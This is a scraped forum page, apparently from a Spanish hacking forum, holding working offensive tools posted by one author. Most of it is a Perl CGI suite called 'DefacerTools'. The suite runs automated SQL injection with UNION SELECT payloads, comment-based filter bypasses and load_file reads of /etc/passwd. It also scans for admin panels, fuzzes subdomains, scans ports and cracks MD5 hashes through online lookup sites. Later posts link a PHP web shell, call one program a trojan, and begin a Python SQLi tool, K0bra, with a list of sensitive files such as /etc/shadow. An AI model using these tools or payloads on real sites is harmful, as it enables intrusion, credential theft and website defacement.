  70.    'yonetim.asp',                   'yonetici.asp',
  71.    'admin/account.asp',             'admin/home.asp',
  72.    'admin/controlpanel.asp',        'admin/cp.asp',
  73.    'cp.asp',                        'administrator/index.asp',
  74.    'administrator/login.asp',       'administrator/account.asp',
  75.    'administrator.asp',             'modelsearch/login.asp',
  76.    'moderator.asp',                 'moderator/login.asp',
  77.    'moderator/admin.asp',           'account.asp',
  78.    'controlpanel.asp',              'admincontrol.asp',
  79.    'adminpanel.asp',                'fileadmin/',
  80.    'fileadmin.php',                 'fileadmin.asp',
  81.    'fileadmin.html',                'administration.html',
  82.    'sysadmin.php',                  'sysadmin.html',
  83.    'phpmyadmin/',                   'myadmin/',
  84.    'sysadmin.asp',                  'sysadmin/',
  85.    'ur-admin.asp',                  'ur-admin.php',
  86.    'ur-admin.html',                 'ur-admin/',
  87.    'Server.php',                    'Server.html',
  88.    'Server.asp',                    'Server/',
  89.    'wp-admin/',                     'administr8.php',
  90.    'administr8.html',               'administr8/',
  91.    'administr8.asp',                'webadmin/',
  92.    'webadmin.php',                  'webadmin.asp',
  93.    'webadmin.html',                 'administratie/',
  94.    'admins/',                       'admins.php',
  95.    'admins.asp',                    'admins.html',
  96.    'administrivia/',                'Database_Administration/',
  97.    'WebAdmin/',                     'useradmin/',
  98.    'sysadmins/',                    'admin1/',
  99.    'system-administration/',        'administrators/',
  100.    'pgadmin/',                      'directadmin/',
  101.    'staradmin/',                    'ServerAdministrator/',
  102.    'SysAdmin/',                     'administer/',
  103.    'LiveUser_Admin/',               'sys-admin/',
  104.    'typo3/',                        'panel/',
  105.    'cpanel/',                       'cPanel/',
  106.    'cpanel_file/',                  'platz_login/',
  107.    'rcLogin/',                      'blogindex/',
  108.    'formslogin/',                   'autologin/',
  109.    'support_login/',                'meta_login/',
  110.    'manuallogin/',                  'simpleLogin/',
  111.    'loginflat/',                    'utility_login/',
  112.    'showlogin/',                    'memlogin/',
  113.    'members/',                      'login-redirect/',
  114.    'sub-login/',                    'wp-login/',
  115.    'login1/',                       'dir-login/',
  116.    'login_db/',                     'xlogin/',
  117.    'smblogin/',                     'customer_login/',
  118.    'UserLogin/',                    'login-us/',
  119.    'acct_login/',                   'admin_area/',
  120.    'bigadmin/',                     'project-admins/',
  121.    'phppgadmin/',                   'pureadmin/',
  122.    'sql-admin/',                    'radmind/',
  123.    'openvpnadmin/',                 'wizmysqladmin/',
  124.    'vadmind/',                      'ezsqliteadmin/',
  125.    'hpwebjetadmin/',                'newsadmin/',
  126.    'adminpro/',                     'Lotus_Domino_Admin/',
  127.    'bbadmin/',                      'vmailadmin/',
  128.    'Indy_admin/',                   'ccp14admin/',
  129.    'irc-macadmin/',                 'banneradmin/',
  130.    'sshadmin/',                     'phpldapadmin/',
  131.    'macadmin/',                     'administratoraccounts/',
  132.    'admin4_account/',               'admin4_colon/',
  133.    'radmind-1/',                    'Super-Admin/',
  134.    'AdminTools/',                   'cmsadmin/',
  135.    'SysAdmin2/',                    'globes_admin/',
  136.    'cadmins/',                      'phpSQLiteAdmin/',
  137.    'navSiteAdmin/',                 'server_admin_small/',
  138.    'logo_sysadmin/',                'server/',
  139.    'database_administration/',      'power_user/',
  140.    'system_administration/',        'ss_vms_admin_sm/'
  141. );
  142.  
  143. my @dns = ('www');
  144.  
  145. #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
  146.  
  147. my $nave = LWP::UserAgent->new;
  148. $nave->agent(
  149. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  150. );
  151. $nave->timeout(5);
  152.  
  153. my %rta;
  154.  
  155. my $que  = new CGI;
  156. my @ques = $que->param;
  157.  
  158. for (@ques) {
  159.    $rta{$_} = $que->param($_);
  160. }
  161.  
  162. print "Content-type:text/html\n\n";
  163.  
  164. <style type=text/css>
  165.  
  166.  
  167. .main {
  168. margin : -287px 0px 0px -490px;
  169. border : White solid 1px;
  170. BORDER-COLOR: #00FF00;
  171. }
  172.  
  173. #pie {
  174. position: absolute;
  175. bottom: 0;
  176. }
  177.  
  178. body,a:link {
  179. font: normal 16px Verdana, Arial, Helvetica,
  180. sans-serif;
  181. background-color: #000000;
  182. color:#00FF00;
  183. Courier New;
  184. cursor:crosshair;
  185. font-size: small;
  186. }
  187.  
  188. input,table.outset,table.bord,table,textarea,select {
  189. background-color:black;color:#00FF00;
  190. border: solid 1px #00FF00;
  191. border-color:#00FF00
  192. }
  193.  
  194. a:link,a:visited,a:active {
  195. color: #00FF00;
  196. font: normal 16px Verdana, Arial, Helvetica,
  197. sans-serif;
  198. text-decoration: none;
  199. }
  200.  
  201. </style>";
  202.  
  203. if ( $rta{'hex'} ) {
  204.    logouno();
  205.    print
  206. qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
  207.    copyright();
  208. }
  209. elsif ( $rta{'textocode'} ) {
  210.    logouno();
  211.    print "[+] Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>";
  212.    print "</center>";
  213.    copyright();
  214. }
  215. elsif ( $rta{'panelfinder'} ) {
  216.    logodos();
  217.    print
  218. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
  219.    copyright();
  220. }
  221. elsif ( $rta{'buscarpanel'} ) {
  222.  
  223.    my $page = $rta{'buscarpanel'};
  224.    logodos();
  225.    print "<br>[+] Scanning $page<br><br>";
  226.    for $path (@panels) {
  227.        $code = tomax( $page . "/" . $path );
  228.        if ( $code->is_success ) {
  229.            print "[Link] : " . $page . "/" . $path . "<br>";
  230.        }
  231.    }
  232.    print "<br><br>[+] Finish<br>";
  233.    copyright();
  234. }
  235. elsif ( $rta{'pathsfinder'} ) {
  236.    logotres();
  237.    print
  238. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
  239.    copyright();
  240. }
  241. elsif ( $rta{'buscarpaths'} ) {
  242.    logotres();
  243.  
  244.    my $page = $rta{'buscarpaths'};
  245.  
  246.    my $code  = toma($page);
  247.    my @links = get_links($code);
  248.  
  249.    print "<br><br>[+] Finding paths<br><br>";
  250.  
  251.    for my $com (@links) {
  252.        my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  253.        if ( $path =~ /\/(.*)$/ ) {
  254.            my $path1 = $1;
  255.            $page =~ s/$path1//ig;
  256.            my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  257.            if ( $path =~ /(.*)\// ) {
  258.                my $parche = $1;
  259.                unless ( $repetidos =~ /$parche/ ) {
  260.                    $repetidos .= " " . $parche;
  261.                    my $code = toma( "http://" . $auth . $parche );
  262.  
  263.                    if ( $code =~ /Index of (.*)</ig ) {
  264.                        my $dir_found = $1;
  265.                        chomp $dir_found;
  266.                        print "[+] Directory Found : $page/$dir_found<br>";
  267.                    }
  268.                }
  269.            }
  270.        }
  271.    }
  272.    print "<br><br>[+]Finished<br>";
  273.    copyright();
  274. }
  275. elsif ( $rta{'sqliscanner'} ) {
  276.    logocuatro();
  277.    print
  278. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
  279.    copyright();
  280. }
  281. elsif ( $rta{'buscarsql'} ) {
  282.    logocuatro();
  283.    print "<br><br>[+] Scanning page<br><br>";
  284.    &length( $rta{'buscarsql'} );
  285.    print "<br><br>[+] Finished";
  286.    copyright();
  287. }
  288. elsif ( $rta{'fuzzdns'} ) {
  289.    logocinco();
  290.    print
  291. qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
  292.    copyright();
  293. }
  294. elsif ( $rta{'buscardns'} ) {
  295.    logocinco();
  296.  
  297.    my $page = $rta{'buscardns'};
  298.  
  299.    print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>";
  300.    for my $path (@dns) {
  301.        $code = tomax( "http://" . $path . "." . $page );
  302.        if ( $code->is_success ) {
  303.            print "[+] Found : http://" . $path . "." . $page . "<br>";
  304.        }
  305.    }
  306.    print "<br><br>[+] Finished<br><br>";
  307.    copyright();
  308. }
  309. elsif ( $rta{'finderpass'} ) {
  310.    logoseis();
  311.    print
  312. qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
  313.    copyright();
  314. }
  315. elsif ( $rta{'buscarhash'} ) {
  316.    logoseis();
  317.    &crackit( $rta{'buscarhash'} );
  318.    copyright();
  319. }
  320. elsif ( $rta{'portscanner'} ) {
  321.    logosiete();
  322.    print
  323. qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
  324.    copyright();
  325. }
  326. elsif ( $rta{'buscarpuertos'} ) {
  327.    logosiete();
  328.    scanuno( $rta{'buscarpuertos'} );
  329.    copyright();
  330. }
  331. elsif ( $rta{'home'} ) {
  332.    sintax();
  333. }
  334. else {
  335.    sintax();
  336. }
  337.  
  338. sub sintax {
  339.    print qq(
  340. <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
  341. <br><br>
  342. <h1><center>DefacerTools</center></h1>
  343. <br><br>
  344. <center>
  345. <table border=1>
  346. <td class=main><center><b>Tools</b></center></td><tr>
  347. <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr>
  348. <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
  349. <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
  350. <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
  351. <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
  352. <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
  353. <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
  354. </table>
  355. </center>
  356. );
  357. }
  358.  
  359. sub logouno {
  360.    print qq(
  361. <center>
  362. <pre>
  363.  
  364.  
  365.  
  366. @    @                 @@@@                                        
  367. @    @                @    @                            @          
  368. @    @                @                                 @          
  369. @    @   @@@  @  @    @       @@@  @ @@  @   @  @@@  @@ @@  @@@  @@
  370. @@@@@@  @   @ @  @    @      @   @ @@  @ @   @ @   @ @  @  @   @ @
  371. @    @  @@@@@  @@     @      @   @ @   @  @ @  @@@@@ @  @  @@@@@ @
  372. @    @  @      @@     @      @   @ @   @  @ @  @     @  @  @     @
  373. @    @  @   @ @  @    @    @ @   @ @   @   @   @   @ @  @  @   @ @
  374. @    @   @@@  @  @     @@@@   @@@  @   @   @    @@@  @   @  @@@  @
  375.  
  376.  
  377.  
  378.  
  379. </pre>
  380.  
  381.  
  382. );
  383. }
  384.  
  385. sub logodos {
  386.    print qq(
  387. <center>
  388. <pre>
  389.  
  390.  
  391.  
  392. @@@@@                    @ @@@@@ @           @        
  393. @    @                   @ @                 @        
  394. @    @                   @ @                 @        
  395. @    @  @@@  @ @@   @@@  @ @     @ @ @@   @@@@  @@@  @@
  396. @@@@@      @ @@  @ @   @ @ @@@@  @ @@  @ @   @ @   @ @
  397. @       @@@@ @   @ @@@@@ @ @     @ @   @ @   @ @@@@@ @
  398. @      @   @ @   @ @     @ @     @ @   @ @   @ @     @
  399. @      @   @ @   @ @   @ @ @     @ @   @ @   @ @   @ @
  400. @       @@@@ @   @  @@@  @ @     @ @   @  @@@@  @@@  @
  401.  
  402.  
  403.  
  404.  
  405. </pre>
  406.  
  407.  
  408. );
  409. }
  410.  
  411. sub logotres {
  412.    print qq(
  413. <center>
  414. <pre>
  415.  
  416.  
  417.  
  418. @@@@@           @          @@@@@ @           @        
  419. @    @       @  @          @                 @        
  420. @    @       @  @          @                 @        
  421. @    @  @@@  @@ @ @@   @@  @     @ @ @@   @@@@  @@@  @@
  422. @@@@@      @ @  @@  @ @  @ @@@@  @ @@  @ @   @ @   @ @
  423. @       @@@@ @  @   @  @   @     @ @   @ @   @ @@@@@ @
  424. @      @   @ @  @   @   @  @     @ @   @ @   @ @     @
  425. @      @   @ @  @   @ @  @ @     @ @   @ @   @ @   @ @
  426. @       @@@@  @ @   @  @@  @     @ @   @  @@@@  @@@  @
  427.  
  428.  
  429.  
  430.  
  431.  
  432. </pre>
  433.  
  434.  
  435. );
  436. }
  437.  
  438. sub logocuatro {
  439.    print qq(
  440. <center>
  441. <pre>
  442.  
  443.  
  444.  
  445.  @@@    @@@@   @     @      @@@                                  
  446. @   @  @    @  @     @     @   @                                  
  447. @      @    @  @     @     @                                      
  448. @      @    @  @     @     @       @@@   @@@  @ @@  @ @@   @@@  @@
  449.  @@@   @    @  @     @      @@@   @   @     @ @@  @ @@  @ @   @ @
  450.     @  @    @  @     @         @  @      @@@@ @   @ @   @ @@@@@ @
  451.     @  @  @ @  @     @         @  @     @   @ @   @ @   @ @     @
  452. @   @  @   @@  @     @     @   @  @   @ @   @ @   @ @   @ @   @ @
  453.  @@@    @@@@   @@@@@ @      @@@    @@@   @@@@ @   @ @   @  @@@  @
  454.             @                                                    
  455.  
  456.  
  457.  
  458.  
  459.  
  460. </pre>
  461.  
  462.  
  463. );
  464. }
  465.  
  466. sub logocinco {
  467.    print qq(
  468. <center>
  469. <pre>
  470.  
  471.  
  472.  
  473. @@@@@                    @@@@    @    @   @@@
  474. @                        @   @   @@   @  @   @
  475. @                        @    @  @@   @  @    
  476. @     @   @ @@@@ @@@@    @    @  @ @  @  @    
  477. @@@@  @   @    @    @    @    @  @ @  @   @@@
  478. @     @   @   @    @     @    @  @  @ @      @
  479. @     @   @  @    @      @    @  @   @@      @
  480. @     @  @@ @    @       @   @   @   @@  @   @
  481. @      @@ @ @@@@ @@@@    @@@@    @    @   @@@
  482.  
  483.  
  484.  
  485.  
  486.  
  487.  
  488. </pre>
  489.  
  490.  
  491. );
  492. }
  493.  
  494. sub logoseis {
  495.    print qq(
  496. <center>
  497. <pre>
  498.  
  499.  
  500.  
  501. @@@@@ @           @          @@@@@                
  502. @                 @          @    @                
  503. @                 @          @    @                
  504. @     @ @ @@   @@@@  @@@  @@ @    @  @@@   @@   @@
  505. @@@@  @ @@  @ @   @ @   @ @  @@@@@      @ @  @ @  @
  506. @     @ @   @ @   @ @@@@@ @  @       @@@@  @    @  
  507. @     @ @   @ @   @ @     @  @      @   @   @    @
  508. @     @ @   @ @   @ @   @ @  @      @   @ @  @ @  @
  509. @     @ @   @  @@@@  @@@  @  @       @@@@  @@   @@
  510.  
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517. </pre>
  518.  
  519.  
  520. );
  521. }
  522.  
  523. sub logosiete {
  524.    print qq(
  525. <center>
  526. <pre>
  527.  
  528.  
  529.  
  530. @@@@@               @@@                                  
  531. @    @          @  @   @                                  
  532. @    @          @  @                                      
  533. @    @  @@@  @@ @@ @       @@@   @@@  @ @@  @ @@   @@@  @@
  534. @@@@@  @   @ @  @   @@@   @   @     @ @@  @ @@  @ @   @ @
  535. @      @   @ @  @      @  @      @@@@ @   @ @   @ @@@@@ @
  536. @      @   @ @  @      @  @     @   @ @   @ @   @ @     @
  537. @      @   @ @  @  @   @  @   @ @   @ @   @ @   @ @   @ @
  538. @       @@@  @   @  @@@    @@@   @@@@ @   @ @   @  @@@  @
  539.  
  540.  
  541.  
  542.  
  543.  
  544.  
  545.  
  546.  
  547. </pre>
  548.  
  549.  
  550. );
  551. }
  552.  
  553. sub copyright {
  554.    print
  555. qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
  556. }
  557.  
  558. sub length {
  559.    print "<br>[+] Looking for the number of columns<br><br>";
  560.    my $rows = "0";
  561.    my $asc;
  562.    my $page = $_[0];
  563.    ( $pass1, $pass2 ) = &bypass( $_[1] );
  564.  
  565.    $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  566.    $total = "1";
  567.    for my $rows ( 2 .. 200 ) {
  568.        $asc .=
  569.          "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  570.        $total .= "," . $rows;
  571.        $injection =
  572.            $page . "1"
  573.          . $pass1 . "and"
  574.          . $pass1 . "1=0"
  575.          . $pass1 . "union"
  576.          . $pass1
  577.          . "select"
  578.          . $pass1
  579.          . $alert
  580.          . $asc;
  581.        $test = toma($injection);
  582.        if ( $test =~ /RATSXPDOWN/ ) {
  583.            @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  584.            $control = 1;
  585.            my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  586.            my $save = $auth;
  587.            $total =~ s/$number[0]/hackman/;
  588.            print "[SQLI] : "
  589.              . $page . "1"
  590.              . $pass1 . "and"
  591.              . $pass1 . "1=0"
  592.              . $pass1 . "union"
  593.              . $pass1
  594.              . "select"
  595.              . $pass1
  596.              . $total . "<br>";
  597.            details(
  598.                $page . "1"
  599.                  . $pass1 . "and"
  600.                  . $pass1 . "1=0"
  601.                  . $pass1 . "union"
  602.                  . $pass1
  603.                  . "select"
  604.                  . $pass1
  605.                  . $total,
  606.                "--", ""
  607.            );
  608.        }
  609.    }
  610. }
  611.  
  612. sub details {
  613.    my ( $page, $bypass, $save ) = @_;
  614.    ( $pass1, $pass2 ) = &bypass($bypass);
  615.    if ( $page =~ /(.*)hackman(.*)/ig ) {
  616.        print "<br>[+] Searching information..<br><br>";
  617.        my ( $start, $end ) = ( $1, $2 );
  618.        $inforschema =
  619.            $start
  620.          . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  621.          . $end
  622.          . $pass1 . "from"
  623.          . $pass1
  624.          . "information_schema.tables"
  625.          . $pass2;
  626.        $mysqluser =
  627.            $start
  628.          . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  629.          . $end
  630.          . $pass1 . "from"
  631.          . $pass1
  632.          . "mysql.user"
  633.          . $pass2;
  634.        $test3 =
  635.          toma( $start
  636.              . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  637.              . $end
  638.              . $pass2 );
  639.        $test1 = toma($inforschema);
  640.        $test2 = toma($mysqluser);
  641.        if ( $test2 =~ /ERTOR854/ig ) {
  642.            print "[mysql.user] : ON<br>";
  643.        }
  644.        else {
  645.            print "[mysql.user] : OFF<br>";
  646.        }
  647.        if ( $test1 =~ /ERTOR854/ig ) {
  648.            print "[information_schema.tables] : ON<br>";
  649.        }
  650.        else {
  651.            print "[information_schema.tables] : OFF<br>";
  652.        }
  653.        if ( $test3 =~ /ERTOR854/ig ) {
  654.            print "[load_file] : ON<br>";
  655.        }
  656.        $concat =
  657. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  658.        $injection = $start . $concat . $end . $pass2;
  659.        $code      = toma($injection);
  660.        if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
  661.            print
  662. "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
  663.        }
  664.        else {
  665.            print "<br>[-] Not found any data<br>";
  666.        }
  667.    }
  668. }
  669.  
  670. sub encode {
  671.    my $string = $_[0];
  672.    $hex = '0x';
  673.    for ( split //, $string ) {
  674.        $hex .= sprintf "%x", ord;
  675.    }
  676.    return $hex;
  677. }
  678.  
  679. sub bypass {
  680.    if    ( $_[0] eq "/*" )  { return ( "/**/", "/**/" ); }
  681.    elsif ( $_[0] eq "%20" ) { return ( "%20",  "%00" ); }
  682.    else                     { return ( "+",    "--" ); }
  683. }
  684.  
  685. sub ascii {
  686.    return join ',', unpack "U*", $_[0];
  687. }
  688.  
  689. sub toma {
  690.    return $nave->get( $_[0] )->content;
  691. }
  692.  
  693. sub tomax {
  694.    return $nave->get( $_[0] );
  695. }
  696.  
  697. sub get_links {
  698.  
  699.    $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  700.    return @links;
  701.  
  702.    sub agarrar {
  703.        my ( $a, %b ) = @_;
  704.        push( @links, values %b );
  705.    }
  706. }
  707.  
  708. sub crackit {
  709.  
  710.    my $secret = $_[0];
  711.  
  712.    print "<br><br>[+] Cracking $_[0]<br><br>";
  713.  
  714.    my %hash = (
  715.  
  716.        'http://passcracking.com/' => {
  717.            'tipo'      => 'post',
  718.            'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
  719.            'regex' =>
  720. '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  721.        },
  722.        'http://md5.hashcracking.com/search.php?md5=' => {
  723.            'tipo'  => 'get',
  724.            'regex' => 'Cleartext of $_[0] is (.*)',
  725.        },
  726.        'http://www.bigtrapeze.com/md5/' => {
  727.            'tipo'      => 'post',
  728.            'variables' => '{"query" => $_[0], "submit" => " Crack "}',
  729.            'regex' =>
  730. 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  731.        },
  732.        'http://opencrack.hashkiller.com/' => {
  733.            'tipo' => 'post',
  734.            'variables' =>
  735.              '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  736.            'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
  737.        },
  738.        'http://www.hashchecker.com/index.php?_sls=search_hash' => {
  739.            'tipo'      => 'post',
  740.            'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
  741.            'regex' =>
  742. '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  743.        },
  744.        'http://victorov.su/md5/?md5e=&md5d=' => {
  745.            'tipo'  => 'get',
  746.            'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  747.        }
  748.    );
  749.  
  750.    for my $data ( keys %hash ) {
  751.  
  752.        if ( $hash{$data}{tipo} eq "get" ) {
  753.            $code = toma( $data . $_[0] );
  754.            if ( $code =~ /$hash{$data}{regex}/ig ) {
  755.                print "<br>[+] Decoded : " . $1 . "<br><br>";
  756.                print $secret. ":" . $1 . "<br>";
  757.            }
  758.        }
  759.        else {
  760.            $code = tomar( $data, $hash{$data}{variables} );
  761.            if ( $code =~ /$hash{$data}{regex}/ig ) {
  762.                print $secret. ":" . $1 . "<br>";
  763.            }
  764.        }
  765.    }
  766.    print "<br>[+] Finish<br>";
  767. }
  768.  
  769. sub tomar {
  770.    my ( $web, $var ) = @_;
  771.    return $nave->post( $web, [ %{$var} ] )->content;
  772. }
  773.  
  774. sub scanuno {
  775.  
  776.    my %ports = (
  777.        "21"   => "ftp",
  778.        "22"   => "ssh",
  779.        "25"   => "smtp",
  780.        "80"   => "http",
  781.        "110"  => "pop3",
  782.        "3306" => "mysql"
  783.    );
  784.  
  785.    print "<br>[+] Scanning $_[0]<br><br><br>";
  786.  
  787.    for my $port ( keys %ports ) {
  788.  
  789.        if (
  790.            new IO::Socket::INET(
  791.                PeerAddr => $_[0],
  792.                PeerPort => $port,
  793.                Proto    => "tcp",
  794.                Timeout  => 0.5
  795.            )
  796.          )
  797.        {
  798.            print "[Port] : "
  799.              . $port
  800.              . " [Service] : "
  801.              . $ports{$port} . "<br>";
  802.        }
  803.    }
  804.    print "<br><br>[+] Scan Finish<br>";
  805. }
  806.  
  807. # The End ?
  808.  
  809.  
429  Programación / Scripting / Re: [Perl] Commander en: 9 Diciembre 2011, 15:06 pm
yo hice una phpshell llamada poisonshell , tiene lo que buscas , solo es cuestion de buscarla en google , la version 1.0 de mi shell esta aca.

http://pastebin.com/FM7j0w7N

eso si lo que buscas es algo como commander pero que pida password no te puedo ayudar porque tendria que hacer una nueva version de este programa , otra cosa espero que tengas en cuenta que commander es solo un troyano que se maneja por navegador , no tiene nada que ver con phpshells,c99,r57.
430  Programación / Scripting / [Python] K0bra 0.3 en: 3 Diciembre 2011, 16:35 pm
Un completo scanner SQLI hecho en python

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
  • Manejo de control+c
Código
  1. #!usr/bin/python
  2. #k0bra 0.3 (C) Doddy Hackman 2011
  3.  
  4. import os,sys,urllib2,re,binascii
  5. from urlparse import urlparse
  6.  
  7. files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/o